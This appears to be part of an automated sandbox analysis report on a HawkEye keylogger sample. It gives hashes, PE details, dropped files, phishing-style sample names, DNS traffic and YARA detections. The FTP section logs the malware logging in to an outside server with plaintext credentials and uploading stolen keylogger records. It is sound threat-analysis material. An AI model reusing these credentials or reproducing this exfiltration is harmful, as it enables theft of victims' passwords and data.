54328bd36c14bd82ddaa0c04b25ed9ad | DHL Notification-pdf.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | riwWTzYyhX.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | jGMOFmyhHT.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | triage_dropped_file.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | PAYMENT VOUCHER096685_pdf.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | PO LS632911DX.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | UPS Anfrageformular 1.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | INVOICE RECEIPT NO253334.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | Drw3274-pdf.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | ZJWRjB35qc.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | LF4fOmIcwv.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | d3e7114fb62aee098ae453d316cd3601c8cba87e6e6a1.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | K5GDSm1DpM.exe | malicious | 142.250.185.196
54328bd36c14bd82ddaa0c04b25ed9ad | ifJoPwvs7o.exe | malicious | 142.250.185.196

                                                          Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | hcpUDQyVUZ.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Payment Slip.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | OrderConfirmation23072021.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Inv-04_PDF.vbs | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Overdue payment_20218423384940404043.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Inv-04_PDF.vbs | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Nuovo ordine .exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | SecuriteInfo.com.generic.ml.15285.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | HPE#0025_PDF.vbs | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | GH5mpZkbYZ.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | RFQ_20210715 & PO#2021.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | ConsoleApp5.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | QuoteGMC828300912883755PDF.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | QuoteGMC77399940102334PDF.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | wanda.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Statement SKBMT 09218.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | INOVICE -Reconciliation.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | sGwZBR8YeX.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | 8nkNRwtNfA.exe | malicious
C:\Users\user\AppData\Local\Temp\InstallUtil.exe | KwS2xupF5j.exe | malicious

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ypBoHI5G3x.exe.log
                                                                                                  Process:C:\Users\user\Desktop\ypBoHI5G3x.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1402
                                                                                                  Entropy (8bit):5.338819835253785
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr7K84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoesX3:MIHK5HKXE1qHbHK5AHKzvKviYHKhQnoe
                                                                                                  MD5:F2152F0304453BCFB93E6D4F93C3F0DC
                                                                                                  SHA1:DD69A4D7F9F9C8D97F1DF535BA3949E9325B5A2F
                                                                                                  SHA-256:5A4D59CD30A1AF620B87602BC23A3F1EFEF792884053DAE6A89D1AC9AAD4A411
                                                                                                  SHA-512:02402D9EAA2DF813F83A265C31D00048F84AD18AE23935B428062A9E09B173B13E93A3CACC6547277DA6F937BBC413B839620BA600144739DA37086E03DD8B4F
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                                                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  Process:C:\Users\user\Desktop\ypBoHI5G3x.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41064
                                                                                                  Entropy (8bit):6.164873449128079
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:FtpFVLK0MsihB9VKS7xdgE7KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+sPZTd:ZBMs2SqdD86Iq8gZZFyViML3an
                                                                                                  MD5:EFEC8C379D165E3F33B536739AEE26A3
                                                                                                  SHA1:C875908ACBA5CAC1E0B40F06A83F0F156A2640FA
                                                                                                  SHA-256:46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
                                                                                                  SHA-512:497847EC115D9AF78899E6DC20EC32A60B16954F83CF5169A23DD3F1459CB632DAC95417BD898FD1895C9FE2262FCBF7838FCF6919FB3B851A0557FBE07CCFFA
                                                                                                  Malicious:true
                                                                                                  Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
• Filename: hcpUDQyVUZ.exe, Detection: malicious
• Filename: Payment Slip.exe, Detection: malicious
• Filename: OrderConfirmation23072021.exe, Detection: malicious
• Filename: Inv-04_PDF.vbs, Detection: malicious
• Filename: Overdue payment_20218423384940404043.exe, Detection: malicious
• Filename: Inv-04_PDF.vbs, Detection: malicious
• Filename: Nuovo ordine .exe, Detection: malicious
• Filename: SecuriteInfo.com.generic.ml.15285.exe, Detection: malicious
• Filename: HPE#0025_PDF.vbs, Detection: malicious
• Filename: GH5mpZkbYZ.exe, Detection: malicious
• Filename: RFQ_20210715 & PO#2021.exe, Detection: malicious
• Filename: ConsoleApp5.exe, Detection: malicious
• Filename: QuoteGMC828300912883755PDF.exe, Detection: malicious
• Filename: QuoteGMC77399940102334PDF.exe, Detection: malicious
• Filename: wanda.exe, Detection: malicious
• Filename: Statement SKBMT 09218.exe, Detection: malicious
• Filename: INOVICE -Reconciliation.exe, Detection: malicious
• Filename: sGwZBR8YeX.exe, Detection: malicious
• Filename: 8nkNRwtNfA.exe, Detection: malicious
• Filename: KwS2xupF5j.exe, Detection: malicious
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..h>...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                                                                                                  C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: ..
                                                                                                  C:\Users\user\AppData\Roaming\pid.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:g:g
                                                                                                  MD5:198DD5FB9C43B2D29A548F8C77E85CF9
                                                                                                  SHA1:A3FE38AAB7B1CEF4210C0BE9EF8A705628CCE604
                                                                                                  SHA-256:B8BAA797B73F2F1B7A1A44EA3B325767BAF1126B0D2F76FE85C8EECB2306B118
                                                                                                  SHA-512:F0EBAE367BC5C77F38E6774B194CD51F8A7539A6FD5E6FEA4F05D1113C42C08159858461D81EB19223F9B70274602DE326EC31DE9DB75F67AB18D5744C76765E
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: 6456
                                                                                                  C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52
                                                                                                  Entropy (8bit):4.23542415146063
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:oNN+E2J5xAIOWRxRI0dAn:oNN723f5RndA
                                                                                                  MD5:B1373E3FE4C9899F688965D763C0879E
                                                                                                  SHA1:E1FB74A3CBBADD75ABEFAC442252C808AA248DD0
                                                                                                  SHA-256:E93F295284100AF6C668750D6050487FC5766080B0934D0FF66546CB72DB6B71
                                                                                                  SHA-512:3AA7A57E22834AB0A3622A4D2EE2A6658CA57EB9AFEDE9BF3422466032C837E9274E9AD82E36B5D833E3BCDA846018503F21E561C730627DA4EC84CAD4768371
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):6.346408618906811
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:ypBoHI5G3x.exe
                                                                                                  File size:1287680
                                                                                                  MD5:08d679d4b9a12137756cc9244bd6f017
                                                                                                  SHA1:580c29bc356057d76873c9c453ed466e1024b7f2
                                                                                                  SHA256:047f33e6f83796d9fc056d7006a6e8ef69696d63eceb29fb1592bb13a62e79bf
                                                                                                  SHA512:e6293a802a6f539be11df5f6d83ee113ad98d8e5566d59810a18359ff0756eabe2b10f4c8bbd1e17222aaf45400b8a89d33f0e5786418347dc5213b79d8d7116
                                                                                                  SSDEEP:24576:1pMP/pBvygA8z+uhHJQNmR3X2rhK1+pSRs/N:1pMt3qu3H261Rs/N
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..4............................~.... ........@.. ....................................`................................

                                                                                                  File Icon

                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x53bb7e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                  Time Stamp:0x34EEBD63 [Sat Feb 21 11:41:23 1998 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x13bb2c        | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x13c000        | 0x5c6        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x13e000        | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                                                                                  Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
.text  | 0x2000          | 0x139b84     | 0x139c00 | False    | 0.581927757719  | data      | 6.35046946452  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc  | 0x13c000        | 0x5c6        | 0x600    | False    | 0.419270833333  | data      | 4.10690969353  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x13e000        | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

Name        | RVA      | Size  | Type                                                                          | Language | Country
RT_VERSION  | 0x13c0a0 | 0x33c | data                                                                          |          |
RT_MANIFEST | 0x13c3dc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators   |          |

                                                                                                  Imports

DLL         | Import
mscoree.dll | _CorExeMain

                                                                                                  Version Infos

Description      | Data
Translation      | 0x0000 0x04b0
LegalCopyright   | Copyright 2014
Assembly Version | 1.0.0.0
InternalName     | School Store.exe
FileVersion      | 1.0.0.0
CompanyName      |
LegalTrademarks  |
Comments         |
ProductName      | School Store
ProductVersion   | 1.0.0.0
FileDescription  | School Store
OriginalFilename | School Store.exe

                                                                                                  Network Behavior

                                                                                                  Snort IDS Alerts

                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                  07/27/21-11:13:57.548141TCP2020410ET TROJAN HawkEye Keylogger FTP4975921192.168.2.645.141.152.18

Network Port Distribution

TCP Packets


UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 27, 2021 11:12:37.949403048 CEST | 192.168.2.6 | 8.8.8.8 | 0xc470 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
Jul 27, 2021 11:13:43.174030066 CEST | 192.168.2.6 | 8.8.8.8 | 0xadd5 | Standard query (0) | 146.215.12.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Jul 27, 2021 11:13:57.284341097 CEST | 192.168.2.6 | 8.8.8.8 | 0xdc03 | Standard query (0) | ftp.vngpack.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 27, 2021 11:12:37.983450890 CEST | 8.8.8.8 | 192.168.2.6 | 0xc470 | No error (0) | www.google.com | | 142.250.185.196 | A (IP address) | IN (0x0001)
Jul 27, 2021 11:13:43.212934971 CEST | 8.8.8.8 | 192.168.2.6 | 0xadd5 | Name error (3) | 146.215.12.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Jul 27, 2021 11:13:57.328638077 CEST | 8.8.8.8 | 192.168.2.6 | 0xdc03 | No error (0) | ftp.vngpack.com | | 45.141.152.18 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 27, 2021 11:12:38.156929970 CEST | 142.250.185.196 | 443 | 192.168.2.6 | 49723 | CN=www.google.com | CN=GTS CA 1C3, O=Google Trust Services LLC, C=US | Mon Jun 28 06:12:58 CEST 2021 | Mon Sep 20 06:12:57 CEST 2021 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
(chain, intermediate) | | | | | CN=GTS CA 1C3, O=Google Trust Services LLC, C=US | CN=GTS Root R1, O=Google Trust Services LLC, C=US | Thu Aug 13 02:00:42 CEST 2020 | Thu Sep 30 02:00:42 CEST 2027 | |
(chain, root) | | | | | CN=GTS Root R1, O=Google Trust Services LLC, C=US | CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE | Fri Jun 19 02:00:42 CEST 2020 | Fri Jan 28 01:00:42 CET 2028 | |

FTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jul 27, 2021 11:13:57.391149998 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
 | | | | | 220-You are user number 8 of 50 allowed.
 | | | | | 220-Local time is now 05:13. Server port: 21.
 | | | | | 220-This is a private system - No anonymous login
 | | | | | 220-IPv6 connections are also welcome on this server.
 | | | | | 220 You will be disconnected after 15 minutes of inactivity.
Jul 27, 2021 11:13:57.392607927 CEST | 49759 | 21 | 192.168.2.6 | 45.141.152.18 | USER newloggsaa@vngpack.com
Jul 27, 2021 11:13:57.409714937 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 331 User newloggsaa@vngpack.com OK. Password required
Jul 27, 2021 11:13:57.411021948 CEST | 49759 | 21 | 192.168.2.6 | 45.141.152.18 | PASS Xpen2000
Jul 27, 2021 11:13:57.448457956 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 230 OK. Current restricted directory is /
Jul 27, 2021 11:13:57.468286037 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 504 Unknown command
Jul 27, 2021 11:13:57.469412088 CEST | 49759 | 21 | 192.168.2.6 | 45.141.152.18 | PWD
Jul 27, 2021 11:13:57.490956068 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 257 "/" is your current location
Jul 27, 2021 11:13:57.491383076 CEST | 49759 | 21 | 192.168.2.6 | 45.141.152.18 | TYPE I
Jul 27, 2021 11:13:57.511980057 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 200 TYPE is now 8-bit binary
Jul 27, 2021 11:13:57.512717009 CEST | 49759 | 21 | 192.168.2.6 | 45.141.152.18 | PASV
Jul 27, 2021 11:13:57.529757023 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 227 Entering Passive Mode (45,141,152,18,246,22)
Jul 27, 2021 11:13:57.548141003 CEST | 49759 | 21 | 192.168.2.6 | 45.141.152.18 | STOR HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
Jul 27, 2021 11:13:57.565314054 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 150 Accepted data connection
Jul 27, 2021 11:13:57.589210987 CEST | 21 | 49759 | 45.141.152.18 | 192.168.2.6 | 226-File successfully transferred
 | | | | | 226 0.024 seconds (measured here), 62.73 Kbytes per second

Behavior

System Behavior

General

Start time: 11:12:34
Start date: 27/07/2021
Path: C:\Users\user\Desktop\ypBoHI5G3x.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\ypBoHI5G3x.exe'
Imagebase: 0xc30000
File size: 1287680 bytes
MD5 hash: 08D679D4B9A12137756CC9244BD6F017
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:13:26
Start date: 27/07/2021
Path: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Imagebase: 0x8b0000
File size: 41064 bytes
MD5 hash: EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000C.00000002.613574939.0000000008110000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
